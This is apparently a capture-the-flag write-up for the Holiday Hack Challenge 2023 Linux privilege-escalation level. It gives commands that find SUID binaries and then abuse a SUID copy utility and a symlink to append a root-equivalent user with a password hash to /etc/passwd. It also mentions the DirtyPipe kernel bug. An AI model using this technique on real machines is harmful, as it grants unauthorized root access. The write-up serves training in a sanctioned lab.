---
icon: material/text-box-outline
---

# Linux PrivEsc

**Difficulty**: :fontawesome-solid-star::fontawesome-solid-star::fontawesome-solid-star::fontawesome-regular-star::fontawesome-regular-star:<br/>
**Direct link**: [LinuxPriveEsc](https://hhc23-wetty.holidayhackchallenge.com/socket.io)

## Objective

!!! question "Request"
    Rose Mold is in Ostrich Saloon on the Island of Misfit Toys. Give her a hand with escalation for a tip about hidden islands.

??? quote "Rose Mold"
    What am I doing in this saloon? The better question is: what planet are you from?

Yes, I’m a troll from the Planet Frost. I decided to stay on Earth after Holiday Hack 2021 and live among the elves because I made such dear friends here.

Whatever. Do you know much about privilege escalation techniques on Linux?

You're asking why? How about I'll tell you why after you help me.

And you might have to use that big brain of yours to get creative, bub.

## Hints

??? tip "Linux Privilege Escalation Techniques"
    There's various ways to escalate privileges on a Linux system.

??? tip "Linux Command Injection"
    Use the privileged binary to overwriting a file to escalate privileges could be a solution, but there's an easier method if you pass it a crafty argument.

## Solution

This was a really interesting challenge. I believe there are two ways to solve this. An easy way, and a hard way. The hard way is the path I took at first and never got to completion. The Linux kernel that is being used in this challenge is succeptiple to what is known as the "DirtyPipe" vulnerability. That is a specific bug that allows writing to memory pages and forcing the OS to write those changes to disk. I was not able to get this to work, but I believe it is an option in this challenge.<br><br>
I opted for the very simple solution of finding all executables that had the SUID bit set in the file permissions. If this bit is set, and you have permission to execute that file you will essentially be executing that file as the root user.<br><br>
There is a file copy utility "simplecopy" that can be used to edit the /etc/passwd file to add a new user with root permissions.

### Admonitions

!!! warning "Anchor the decorations"
    Ensure that all festive decorations, especially electrical ones, are securely anchored. We don’t want them floating off into the tropical sunset!

!!! info "Palm tree lighting"
    While on the island, make sure to hang your Christmas lights on a palm tree. It’s not only festive but also a great beacon for Santa to find you!

### Code blocks

```
find / -perm -u=s -type f 2>/dev/null 

files with suid

/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/simplecopy
```
```
mkdir source
cp /etc/passwd source/passwd
echo 'root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash' >> source/passwd
ln -s /etc destination
/usr/bin/simplecopy source/passwd  destination/passwd
```


## Response

!!! quote "Rose Mold"
    Yup, I knew you knew. You just have that vibe.

To answer your question of why from earlier... Nunya!

But, I will tell you something better, about some information I... found.

There's a hidden, uncharted area somewhere along the coast of this island, and there may be more around the other islands.

The area is supposed to have something on it that's totes worth, but I hear all the bad vibe toys chill there.

That's all I got. K byyeeeee.

Ugh... n00bs...
